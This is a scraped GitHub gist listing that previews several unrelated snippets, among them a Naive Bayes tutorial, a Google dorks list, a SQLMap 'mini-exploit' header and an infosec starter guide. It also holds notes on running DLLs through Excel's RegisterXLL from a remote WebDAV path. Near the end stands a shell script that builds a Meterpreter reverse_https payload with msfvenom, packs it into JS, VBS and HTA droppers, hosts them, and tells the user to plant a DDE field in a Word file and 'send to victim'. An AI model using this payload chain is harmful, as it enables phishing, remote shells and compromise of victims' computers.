Skip to content

Instantly share code, notes, and snippets.

@creaktive
creaktive / 00-NaiveBayesEmPerlEMongoDB.pod
Created February 27, 2012 15:18
Naive Bayes em Perl e MongoDB

Naive Bayes usando Perl e MongoDB

Introdução

Um classificador naive Bayes é provavelmente o exemplo mais tradicional para ilustrar "Inteligência Artificial" na prática. É bastante utilizado na eterna tarefa de discernir entre spam e não-spam (ham).

@stevenswafford
stevenswafford / google-dorks
Created June 6, 2015 05:57
Listing of a number of useful Google dorks.
" _ _ "
" _ /|| . . ||\ _ "
" ( } \||D ' ' ' C||/ { % "
" | /\__,=_[_] ' . . ' [_]_=,__/\ |"
" |_\_ |----| |----| _/_|"
" | |/ | | | | \| |"
" | /_ | | | | _\ |"
It is all fun and games until someone gets hacked!
@ixtel
ixtel / nltk-notebook.ipynb
Created October 19, 2015 13:11 — forked from MHenderson/nltk-notebook.ipynb
NLTK IPython Notebook
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
@NoThrowForwardIt
NoThrowForwardIt / minisqlmap.bs
Created November 16, 2015 17:01 — forked from googleinurl/minisqlmap.sh
MINI-EXPLOIT // SQLMAP
#!/bin/bash
: '
MINI-EXPLOIT // SQLMAP ~
------------------------------------------------------
[+] AUTOR: Cleiton Pinheiro / Nick: googleINURL
[+] EMAIL: [email protected]
[+] Blog: http://blog.inurl.com.br
[+] Twitter: https://twitter.com/googleinurl
@NoThrowForwardIt
NoThrowForwardIt / facecheck2.0.php
Created November 16, 2015 17:05 — forked from googleinurl/facecheck2.0.php
Verificação de usuários Facebook 2.0
<?php
/*
E d i ç ã o - 2.0 / 29-09-2015
--------------------------------------------------------------------------------
[+] AUTOR: Cleiton Pinheiro / Nick: googleINURL
[+] Blog: http://blog.inurl.com.br
--------------------------------------------------------------------------------
*/
@mubix
mubix / infosec_newbie.md
Last active November 7, 2024 19:11
How to start in Infosec
@ryhanson
ryhanson / ExcelXLL.md
Last active November 8, 2024 14:51
Execute a DLL via .xll files and the Excel.Application object's RegisterXLL() method

DLL Execution via Excel.Application RegisterXLL() method

A DLL can be loaded and executed via Excel by initializing the Excel.Application COM object and passing a DLL to the RegisterXLL method. The DLL path does not need to be local, it can also be a UNC path that points to a remote WebDAV server.

When delivering via WebDAV, it should be noted that the DLL is still written to disk but the dropped file is not the one loaded in to the process. This is the case for any file downloaded via WebDAV, and they are stored at: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV\.

The RegisterXLL function expects an XLL add-in which is essentially a specially crafted DLL with specific exports. More info on XLL's can be found on MSDN

The XLL can also be executed by double-clicking the .xll file, however there is a security warning. @rxwx has more notes on this here inc

package net.skoumal.emulatordetector;
import android.os.Build;
import android.util.Log;
import java.io.File;
import android.bluetooth.BluetoothAdapter;
import android.os.Environment;
/**
* Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with
@xillwillx
xillwillx / CactusTorchDDEAUTO.sh
Last active August 6, 2018 07:25
CactusTorchDDEAUTO
git clone https://github.com/mdsecactivebreach/CACTUSTORCH.git && cd CACTUSTORCH
IP=`ip -4 addr show eth0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}'`
msfvenom -p windows/meterpreter/reverse_https LHOST=$IP LPORT=443 -f raw -o payload.bin
PAYLOAD=$(cat payload.bin | base64 -w 0)
sed -i -e 's|var code = ".*|var code = "'$PAYLOAD'";|' CACTUSTORCH.js
sed -i -e 's|Dim code : code = ".*|Dim code : code = "'$PAYLOAD'"|g' CACTUSTORCH.vbs
sed -i -e 's|Dim code : code = ".*|Dim code : code = "'$PAYLOAD'"|g' CACTUSTORCH.hta
cp -t /var/www/html/ CACTUSTORCH.vbs CACTUSTORCH.js CACTUSTORCH.hta
service apache2 start
echo -e "\n\n\n\nOpen Microsoft Word and press CTRL+F9 and copy any of the payloads below in between the { } then save and send to victim.\n\nJS PAYLOAD:\n\